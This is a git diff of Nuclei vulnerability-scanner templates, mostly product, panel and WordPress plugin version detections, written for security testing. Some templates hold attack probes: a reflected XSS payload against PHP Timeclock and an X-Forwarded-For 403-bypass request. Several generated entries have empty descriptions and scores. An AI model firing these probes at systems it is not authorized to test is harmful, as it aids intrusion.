a/poc/other/teradici-pcoip-10702.yaml b/poc/other/teradici-pcoip-10702.yaml index d545818f79..72f8e4d980 100644 --- a/poc/other/teradici-pcoip-10702.yaml +++ b/poc/other/teradici-pcoip-10702.yaml @@ -3,11 +3,6 @@ info: name: Teradici PCoIP Detection author: pdteam severity: info - description: Teradici PColP was detected. - reference: - - https://www.teradici.com/ - classification: - cwe-id: CWE-200 tags: tech,pcoip requests: - method: GET @@ -22,5 +17,3 @@ requests: group: 1 regex: - 'PCoIP Connection Manager\/([0-9.]+)\.' - -# Enhanced by mp on 2022/03/24 diff --git a/poc/other/testimonials-widget-45b724a68b01ce9c185687c9932520ff.yaml b/poc/other/testimonials-widget-45b724a68b01ce9c185687c9932520ff.yaml new file mode 100644 index 0000000000..c307e79a1b --- /dev/null +++ b/poc/other/testimonials-widget-45b724a68b01ce9c185687c9932520ff.yaml @@ -0,0 +1,59 @@ +id: testimonials-widget-45b724a68b01ce9c185687c9932520ff + +info: + name: > + Testimonials Widget <= 4.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/439ef0bb-cfac-4d81-b858-46a9837ad58f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/testimonials-widget/" + google-query: inurl:"/wp-content/plugins/testimonials-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,testimonials-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/testimonials-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "testimonials-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4') \ No newline at end of file diff --git a/poc/other/tileserver-gl-10786.yaml b/poc/other/tileserver-gl-10786.yaml index 6637754c1c..eb77c21721 100644 --- a/poc/other/tileserver-gl-10786.yaml +++ b/poc/other/tileserver-gl-10786.yaml @@ -1,25 +1,31 @@ id: tileserver-gl + info: name: TileServer GL author: DhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7296 + reference: + - https://www.exploit-db.com/ghdb/7296 metadata: shodan-query: http.title:"TileServer GL - Server for vector and raster maps with GL styles" google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles" tags: tech,tileserver + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - "TileServer GL - Server for vector and raster maps with GL styles" + - type: status status: - 200 + extractors: - type: regex part: body diff --git a/poc/other/trace-method-10827.yaml b/poc/other/trace-method-10827.yaml index 8ede32ed2f..99aa0ed2ed 100644 --- a/poc/other/trace-method-10827.yaml +++ b/poc/other/trace-method-10827.yaml @@ -1,26 +1,32 @@ id: HTTP-TRACE + info: name: HTTP TRACE method enabled author: nodauf severity: info + reference: + - https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ tags: misc,generic - reference: https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ + requests: - method: TRACE path: - "{{BaseURL}}" + matchers: - type: word name: trace-request + part: body words: - "TRACE / HTTP" - part: body + - method: OPTIONS path: - "{{BaseURL}}" + matchers: - type: regex name: options-request + part: header regex: - "(?i)Allow: [A-Z,]*TRACE" - part: header diff --git a/poc/other/tuxedo-connected-controller-10852.yaml b/poc/other/tuxedo-connected-controller-10852.yaml index 279b7c2248..1af2497800 100644 --- a/poc/other/tuxedo-connected-controller-10852.yaml +++ b/poc/other/tuxedo-connected-controller-10852.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6486 - tags: panel + tags: panel,tuxedo requests: - method: GET path: diff --git a/poc/other/txt-fingerprint-10863.yaml b/poc/other/txt-fingerprint-10863.yaml index 425351ac26..3645eab84d 100644 --- a/poc/other/txt-fingerprint-10863.yaml +++ b/poc/other/txt-fingerprint-10863.yaml @@ -1,8 +1,13 @@ id: txt-fingerprint info: - name: TXT Fingerprint + name: DNS TXT Record Detected author: pdteam severity: info + description: A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server. + reference: + - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/ + classification: + cwe-id: CWE-200 tags: dns,txt dns: - name: "{{FQDN}}" @@ -16,3 +21,5 @@ dns: group: 1 regex: - "IN\tTXT\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/poc/other/unencrypted-shared-preferences.yaml b/poc/other/unencrypted-shared-preferences.yaml new file mode 100644 index 0000000000..133b0e32d4 --- /dev/null +++ b/poc/other/unencrypted-shared-preferences.yaml @@ -0,0 +1,29 @@ +id: unencrypted-shared-preferences + +info: + name: Unencrypted Shared Preferences + author: YoruYagami + severity: medium + description: | + This template detects the use of unencrypted shared preferences for storing sensitive data. Storing sensitive data in plain text can expose it to unauthorized access if the device is compromised. + remediation: | + To remediate this issue, encrypt sensitive data before storing it in shared preferences. Example: + + ```java + // Encrypt sensitive data before storing in shared preferences + SharedPreferences sharedPreferences = getSharedPreferences("MyPrefs", Context.MODE_PRIVATE); + SharedPreferences.Editor editor = sharedPreferences.edit(); + String encryptedData = encrypt(data); + editor.putString("key", encryptedData); + editor.apply(); + ``` + +file: + - extensions: + - java + + matchers: + - type: word + words: + - "getSharedPreferences" + - "getPreferences" diff --git a/poc/other/unprotected-broadcast.yaml b/poc/other/unprotected-broadcast.yaml new file mode 100644 index 0000000000..e01ee5f326 --- /dev/null +++ b/poc/other/unprotected-broadcast.yaml @@ -0,0 +1,26 @@ +id: unprotected-broadcast + +info: + name: Unprotected Broadcast + author: YoruYagami + severity: medium + description: | + This template detects broadcasts that are sent without proper protection. Sending unprotected broadcasts can allow malicious applications to intercept or manipulate the broadcast, leading to security vulnerabilities. + remediation: | + To remediate this issue, use permissions to protect broadcasts or use LocalBroadcastManager for local broadcasts. Example: + + ```java + // Protect broadcasts with permissions + Intent intent = new Intent("com.example.MY_ACTION"); + sendBroadcast(intent, "com.example.MY_PERMISSION"); + ``` + +file: + - extensions: + - java + + matchers: + - type: word + words: + - "sendBroadcast" + - "sendOrderedBroadcast" diff --git a/poc/other/upnp-device-10982.yaml b/poc/other/upnp-device-10982.yaml index 27b61aa903..eae42e8b57 100644 --- a/poc/other/upnp-device-10982.yaml +++ b/poc/other/upnp-device-10982.yaml @@ -1,4 +1,5 @@ id: upnp-device-detect + info: name: Detect Basic uPNP Device author: geeknik @@ -6,10 +7,12 @@ info: reference: - https://www.upnp.org/specs/basic/UPnP-basic-Basic-v1-Device.pdf tags: upnp,iot + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: status @@ -22,6 +25,7 @@ requests: - "" part: body condition: and + extractors: - type: regex name: model diff --git a/poc/other/versa-sdwan-11005.yaml b/poc/other/versa-sdwan-11005.yaml index 45fb9e09f7..b6fd5fca8f 100644 --- a/poc/other/versa-sdwan-11005.yaml +++ b/poc/other/versa-sdwan-11005.yaml @@ -1,16 +1,19 @@ id: versa-sdwan + info: name: Versa Networks SD-WAN Application author: pdteam severity: info tags: panel,versa,sdwan + requests: - method: GET path: - "{{BaseURL}}/versa/login.html" + redirects: true max-redirects: 2 matchers: - type: word words: - - "Versa Networks" + - "Versa Networks" \ No newline at end of file diff --git a/poc/other/wallix-accessmanager-panel-11095.yaml b/poc/other/wallix-accessmanager-panel-11095.yaml index 81120e2f25..b9493f8d08 100644 --- a/poc/other/wallix-accessmanager-panel-11095.yaml +++ b/poc/other/wallix-accessmanager-panel-11095.yaml @@ -1,4 +1,5 @@ id: wallix-accessmanager-panel + info: name: Wallix Access Manager Panel author: righettod @@ -8,11 +9,13 @@ info: metadata: shodan-query: http.title:"Wallix Access Manager" tags: panel,wallix + requests: - method: GET path: - '{{BaseURL}}/wabam' - '{{BaseURL}}/wabam/favicon.ico' + stop-at-first-match: true redirects: true max-redirects: 3 @@ -23,6 +26,7 @@ requests: - "status_code==200" - "contains(tolower(body), 'wallix access manager')" condition: and + - type: dsl dsl: - "status_code==200" diff --git a/poc/other/wazuh-panel-11113.yaml b/poc/other/wazuh-panel-11113.yaml index a221088c03..51f8a0dd93 100644 --- a/poc/other/wazuh-panel-11113.yaml +++ b/poc/other/wazuh-panel-11113.yaml @@ -1,20 +1,18 @@ id: wazuh-panel - info: name: Wazuh Login Panel author: cyllective,daffainfo severity: info description: Wazuh - The Open Source Security Platform - reference: https://github.com/wazuh/wazuh + reference: + - https://github.com/wazuh/wazuh metadata: shodan-query: http.title:"Wazuh" tags: panel,wazuh,login - requests: - method: GET path: - "{{BaseURL}}/app/login" - matchers-condition: and matchers: - type: word @@ -25,14 +23,12 @@ requests: - '"icon":"plugins/wazuh/img/icon_blue.png"' - '"url":"/app/wazuh"' condition: or - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - - '"version":"([0-9.]+)"' \ No newline at end of file + - '"version":"([0-9.]+)"' diff --git a/poc/other/woosidebars.yaml b/poc/other/woosidebars.yaml index 70a6912ff6..58b8052e77 100644 --- a/poc/other/woosidebars.yaml +++ b/poc/other/woosidebars.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woosidebars/ metadata: + max-request: 1 plugin_namespace: woosidebars wpscan: https://wpscan.com/plugin/woosidebars tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" @@ -47,3 +47,5 @@ requests: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206b696d77642c534daaea594ffbf10a5e1175aa91d3a75de8cba51b1b6add4d6402206259acb43e7889759cbffdd7048ace35d0238ceede99d3b0195a80bb43c84f4c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/wooyun-2015-148227-11225.yaml b/poc/other/wooyun-2015-148227-11225.yaml index f15f8d3432..9e7b37d26d 100644 --- a/poc/other/wooyun-2015-148227-11225.yaml +++ b/poc/other/wooyun-2015-148227-11225.yaml @@ -5,7 +5,6 @@ info: severity: high reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html tags: seeyon,wooyun,lfi - requests: - method: GET path: diff --git a/poc/other/workspace-one-uem-11394.yaml b/poc/other/workspace-one-uem-11394.yaml index 276937a877..fe79a85764 100644 --- a/poc/other/workspace-one-uem-11394.yaml +++ b/poc/other/workspace-one-uem-11394.yaml @@ -4,7 +4,7 @@ info: author: gevakun severity: info reference: https://twitter.com/Jhaddix/status/1295861505963909120 - tags: panel + tags: panel,workspaceone,login requests: - method: GET path: diff --git a/poc/other/ws-contact-form.yaml b/poc/other/ws-contact-form.yaml new file mode 100644 index 0000000000..a3c8b9773b --- /dev/null +++ b/poc/other/ws-contact-form.yaml @@ -0,0 +1,59 @@ +id: ws-contact-form + +info: + name: > + WS Contact Form <= 1.3.7 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9a2ee71-8be5-448b-a052-1d98880ba847?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ws-contact-form/" + google-query: inurl:"/wp-content/plugins/ws-contact-form/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ws-contact-form,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ws-contact-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ws-contact-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.7') \ No newline at end of file diff --git a/poc/other/wso2-2019-0598-11635.yaml b/poc/other/wso2-2019-0598-11635.yaml index 5b26787cd0..04fdb7b6f0 100644 --- a/poc/other/wso2-2019-0598-11635.yaml +++ b/poc/other/wso2-2019-0598-11635.yaml @@ -1,19 +1,15 @@ id: WSO2-2019-0598 info: - name: WSO2 <5.8.0 - Server Side Request Forgery + name: WSO2 < 5.8.0 - Server Side Request Forgery author: Amnotacat - severity: medium + severity: critical description: | - WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. + This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 remediation: | - Upgrade the product version to 5.8.0 or higher. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cwe-id: CWE-918 + Upgrade the product version to 5.8.0 or higher which are not affected by this SSRF vulnerability. tags: ssrf,wso2,shindig requests: @@ -29,6 +25,4 @@ requests: - type: status status: - - 200 - -# Enhanced by mp on 2022/05/26 + - 200 \ No newline at end of file diff --git a/poc/other/wso2-management-console-11647.yaml b/poc/other/wso2-management-console-11647.yaml index e356b987f5..2738846f21 100644 --- a/poc/other/wso2-management-console-11647.yaml +++ b/poc/other/wso2-management-console-11647.yaml @@ -1,13 +1,10 @@ id: wso2-management-console info: name: WSO2 Management Console - author: dhiyaneshDK,johnk3r + author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/5691 - metadata: - shodan-query: http.favicon.hash:1398055326 - tags: panel,wso2 + reference: https://www.exploit-db.com/ghdb/5691 + tags: panel requests: - method: GET path: @@ -15,16 +12,8 @@ requests: matchers-condition: and matchers: - type: word - part: response words: - - "WSO2 Management Console" - - "WSO2 Carbon Server" - condition: or + - 'WSO2 Management Console' - type: status status: - 200 - extractors: - - type: kval - part: header - kval: - - server diff --git a/poc/other/xff-403-bypass-11684.yaml b/poc/other/xff-403-bypass-11684.yaml index 02951e442d..61a9f441c8 100644 --- a/poc/other/xff-403-bypass-11684.yaml +++ b/poc/other/xff-403-bypass-11684.yaml @@ -1,30 +1,35 @@ id: xff-403-bypass + info: name: X-Forwarded-For 403-forbidden bypass author: vavkamil severity: info description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. tags: fuzz + requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* + - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 + - | GET /test.txt HTTP/1.1 Host: {{Hostname}} Accept: */* X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 + req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 403 && status_code_2 != 403" - "status_code_1 == 403 && status_code_3 != 403" - condition: or + condition: or \ No newline at end of file diff --git a/poc/other/xprober-service-11694.yaml b/poc/other/xprober-service-11694.yaml index cf0af4ee56..222da85829 100644 --- a/poc/other/xprober-service-11694.yaml +++ b/poc/other/xprober-service-11694.yaml @@ -1,4 +1,5 @@ id: xprober-service + info: name: X Prober server information leakage author: pdteam @@ -6,6 +7,7 @@ info: reference: - https://twitter.com/bugbounty_tips/status/1339984643517423616 tags: config,exposure + requests: - method: GET path: @@ -15,4 +17,4 @@ requests: words: - '"appName":"X Prober"' - 'X Prober' - condition: and + condition: and \ No newline at end of file diff --git a/poc/other/yarn-lock-11730.yaml b/poc/other/yarn-lock-11730.yaml index d75da95303..442b673d20 100644 --- a/poc/other/yarn-lock-11730.yaml +++ b/poc/other/yarn-lock-11730.yaml @@ -1,17 +1,14 @@ id: yarn-lock - info: name: yarn lock file disclosure author: oppsec severity: info description: The yarn.lock file stores the versions of each Yarn dependency installed. tags: exposure - requests: - method: GET path: - "{{BaseURL}}/yarn.lock" - matchers-condition: and matchers: - type: word @@ -19,12 +16,10 @@ requests: - "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY." - "# yarn lockfile v1" condition: and - - type: word words: - "text/html" part: header - - type: status status: - 200 diff --git a/poc/other/youzify-1aa241f18c77f0ff8c42f1f057de77cc.yaml b/poc/other/youzify-1aa241f18c77f0ff8c42f1f057de77cc.yaml new file mode 100644 index 0000000000..7cd450c4e9 --- /dev/null +++ b/poc/other/youzify-1aa241f18c77f0ff8c42f1f057de77cc.yaml @@ -0,0 +1,59 @@ +id: youzify-1aa241f18c77f0ff8c42f1f057de77cc + +info: + name: > + Youzify <= 1.2.5 - Authenticated (Contributor+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3e5bc7-63e9-4c0e-ae66-c24c2b8be2da?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/youzify/" + google-query: inurl:"/wp-content/plugins/youzify/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,youzify,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/youzify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "youzify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/other/zabbix-dashboards-access-11756.yaml b/poc/other/zabbix-dashboards-access-11756.yaml index 3177c353c9..fdeeda0601 100644 --- a/poc/other/zabbix-dashboards-access-11756.yaml +++ b/poc/other/zabbix-dashboards-access-11756.yaml @@ -1,17 +1,24 @@ id: zabbix-dashboards-access + info: name: zabbix-dashboards-access author: pussycat0x,vsh00t severity: medium - description: View dashboard with guest login. + description: zabbix-dashboards-access guest login credentials were successful. reference: - https://www.exploit-db.com/ghdb/5595 - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: zabbix,unauth + requests: - method: GET path: - "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list" + matchers-condition: and matchers: - type: word @@ -19,6 +26,9 @@ requests: - "Create dashboard" - "Zabbix SIA" condition: and + - type: status status: - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/other/zbench.yaml b/poc/other/zbench.yaml new file mode 100644 index 0000000000..b44f9738db --- /dev/null +++ b/poc/other/zbench.yaml @@ -0,0 +1,59 @@ +id: zbench + +info: + name: > + zBench <= 1.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/701e349b-ce59-4724-8304-3871a3abbe8b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/zbench/" + google-query: inurl:"/wp-content/themes/zbench/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,zbench,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/zbench/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zbench" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/other/zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d.yaml b/poc/other/zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d.yaml new file mode 100644 index 0000000000..2dc58b4d0e --- /dev/null +++ b/poc/other/zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d.yaml @@ -0,0 +1,59 @@ +id: zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d + +info: + name: > + Zephyr Project Manager <= 3.3.97 - Authenticated (Subscriber+) Privilege Escalation via User Meta Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a6090c3d-e4ee-4c9d-9605-e18000f283c5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.97') \ No newline at end of file diff --git a/poc/other/zhiyuan-oa-info-leak-11800.yaml b/poc/other/zhiyuan-oa-info-leak-11800.yaml index 4ab7a6ded0..53256a5be1 100644 --- a/poc/other/zhiyuan-oa-info-leak-11800.yaml +++ b/poc/other/zhiyuan-oa-info-leak-11800.yaml @@ -1,15 +1,18 @@ id: zhiyuan-oa-info-leak + info: name: Zhiyuan Oa A6-s info Leak author: pikpikcu severity: info reference: - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md - tags: zhiyuan,leak,disclosure,seeyon + tags: zhiyuan,leak,disclosure + requests: - method: GET path: - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - "application/x-msdownload" part: header condition: and + - type: status status: - 200 diff --git a/poc/perl/perl-scanner-9484.yaml b/poc/perl/perl-scanner-9484.yaml index 1349fe440e..0f9d282237 100644 --- a/poc/perl/perl-scanner-9484.yaml +++ b/poc/perl/perl-scanner-9484.yaml @@ -1,16 +1,19 @@ id: perl-scanner + info: name: Perl File Scanner author: geeknik severity: info tags: perl,file + file: - extensions: - - pl # default - - perl # uncommon - - pod # plain old documentation - - pm # perl module - - cgi # common gateway interface + - pl # default + - perl # uncommon + - pod # plain old documentation + - pm # perl module + - cgi # common gateway interface + extractors: - type: regex # Standard random number generators should not be used to generate randomness used for security reasons. For security sensitive randomness a crytographic randomness generator that provides sufficient entropy should be used. diff --git a/poc/php/php-debug-bar-9506.yaml b/poc/php/php-debug-bar-9506.yaml index ed89604e82..98fea9bec4 100644 --- a/poc/php/php-debug-bar-9506.yaml +++ b/poc/php/php-debug-bar-9506.yaml @@ -1,5 +1,4 @@ id: php-debug-bar - info: name: PHP Debug bar author: dhiyaneshDk diff --git a/poc/php/php-fpm-status-9516.yaml b/poc/php/php-fpm-status-9516.yaml old mode 100755 new mode 100644 diff --git a/poc/php/php-ini-9524.yaml b/poc/php/php-ini-9524.yaml index b1f3ab3f0f..cb3ab4ee73 100644 --- a/poc/php/php-ini-9524.yaml +++ b/poc/php/php-ini-9524.yaml @@ -1,27 +1,24 @@ id: php-ini + info: - name: Php.ini File Disclosure - author: geeknik,DhiyaneshDK - severity: low - reference: https://www.php.net/manual/en/configuration.file.php - metadata: - verified: true - shodan-query: php.ini - tags: config,exposure + name: php.ini + author: geeknik + severity: info + requests: - method: GET path: - "{{BaseURL}}/php.ini" + matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: body words: - "[PHP]" - "short_open_tag" - "safe_mode" - "expose_php" condition: and - - type: status - status: - - 200 diff --git a/poc/php/php-timeclock-xss-9554.yaml b/poc/php/php-timeclock-xss-9554.yaml index 55686517b4..cd2b29358f 100644 --- a/poc/php/php-timeclock-xss-9554.yaml +++ b/poc/php/php-timeclock-xss-9554.yaml @@ -1,5 +1,4 @@ id: php-timeclock-xss - info: name: PHP Timeclock 1.04 XSS author: pikpikcu @@ -7,12 +6,10 @@ info: description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities reference: https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock - requests: - method: GET path: - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E" - matchers-condition: and matchers: - type: status @@ -24,7 +21,6 @@ requests: - "PHP Timeclock Admin Login" part: body condition: and - - type: word words: - "text/html" diff --git a/poc/php/php-zerodium-backdoor-rce-9572.yaml b/poc/php/php-zerodium-backdoor-rce-9572.yaml index c026dfba3c..ffc06f17f1 100644 --- a/poc/php/php-zerodium-backdoor-rce-9572.yaml +++ b/poc/php/php-zerodium-backdoor-rce-9572.yaml @@ -1,18 +1,10 @@ id: php-zerodium-backdoor-rce info: - name: PHP 8.1.0-dev - Backdoor Remote Code Execution + name: PHP Zerodium Backdoor RCE author: dhiyaneshDk - severity: critical - description: | - PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code. - reference: - - https://news-web.php.net/php.internals/113838 - - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: php,backdoor,rce,zerodium + reference: https://news-web.php.net/php.internals/113838 + severity: high + tags: php,backdoor requests: - method: GET path: @@ -22,8 +14,6 @@ requests: matchers-condition: and matchers: - type: word - part: body words: - "int(54289)" - -# Enhanced by mp on 2022/05/30 + part: body diff --git a/poc/php/phpcollab-detect-9501.yaml b/poc/php/phpcollab-detect-9501.yaml index 6bfc4b094e..68b8cf104c 100644 --- a/poc/php/phpcollab-detect-9501.yaml +++ b/poc/php/phpcollab-detect-9501.yaml @@ -1,22 +1,18 @@ id: phpcollab-detect - info: name: PhpCollab detect author: pikpikcu severity: info tags: tech,phpcollab - requests: - method: GET path: - "{{BaseURL}}/general/login.php" - matchers: - type: word part: body words: - '<title>PhpCollab' - extractors: - type: regex part: body diff --git a/poc/php/phpinfo-9522.yaml b/poc/php/phpinfo-9522.yaml index 9ee669fc2b..7a6b64ba98 100644 --- a/poc/php/phpinfo-9522.yaml +++ b/poc/php/phpinfo-9522.yaml @@ -3,7 +3,7 @@ info: name: phpinfo Disclosure author: pdteam,daffainfo,meme-lord,dhiyaneshDK severity: low - tags: config,exposure + tags: config,exposure,phpinfo requests: - method: GET path: diff --git a/poc/php/phpmyadmin-panel-9525.yaml b/poc/php/phpmyadmin-panel-9525.yaml index 98b868052e..d890aa64b8 100644 --- a/poc/php/phpmyadmin-panel-9525.yaml +++ b/poc/php/phpmyadmin-panel-9525.yaml @@ -1,8 +1,9 @@ id: phpmyadmin-panel info: name: phpMyAdmin Panel - author: bauthard + author: pdteam severity: info + tags: panel,phpmyadmin requests: - method: GET path: @@ -17,7 +18,16 @@ requests: - "{{BaseURL}}/typo3/phpmyadmin/" - "{{BaseURL}}/web/phpmyadmin/" - "{{BaseURL}}/xampp/phpmyadmin/" + - "{{BaseURL}}/phpMyAdmin/" + stop-at-first-match: true matchers: - type: word words: - - "phpMyAdmin" + - "phpMyAdmin" + - "pmahomme" + extractors: + - type: regex + part: body + group: 1 + regex: + - 'v=([a-z0-9-._]+)' diff --git a/poc/php/phppgadmin-panel-9541.yaml b/poc/php/phppgadmin-panel-9541.yaml index 5129529044..0c224c5166 100644 --- a/poc/php/phppgadmin-panel-9541.yaml +++ b/poc/php/phppgadmin-panel-9541.yaml @@ -1,15 +1,11 @@ id: phppgadmin-panel + info: name: phpPgAdmin Panel author: Ganofins severity: info - description: phpPgAdmin is a third-party tool that you can use to manipulate PostgreSQL databases. - reference: - - https://docs.cpanel.net/cpanel/databases/phppgadmin/ - classification: - cwe-id: CWE-200 - remediation: Ensure proper access. tags: panel,phppgadmin + requests: - method: GET path: @@ -21,5 +17,3 @@ requests: - "browser.php" - "intro.php" condition: and - -# Enhanced by mp on 2022/02/09 diff --git a/poc/php/phpunit-9557.yaml b/poc/php/phpunit-9557.yaml index 5a7c36ba61..e1b69ff940 100644 --- a/poc/php/phpunit-9557.yaml +++ b/poc/php/phpunit-9557.yaml @@ -1,16 +1,21 @@ id: phpunit - info: - name: phpunit.xml file disclosure + name: phpunit.xml File Disclosure + description: Phpunit.xml was created by Romain Bourdon for the development of WampServer 3.1. Phpunit.xml is packaged with WampServer 3.1.9 and XAMPP 5.6.40. author: pikpikcu severity: info tags: exposure - + remediation: Ensure the approved and updated version is installed. + reference: + - https://www.wampserver.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 requests: - method: GET path: - "{{BaseURL}}/phpunit.xml" - 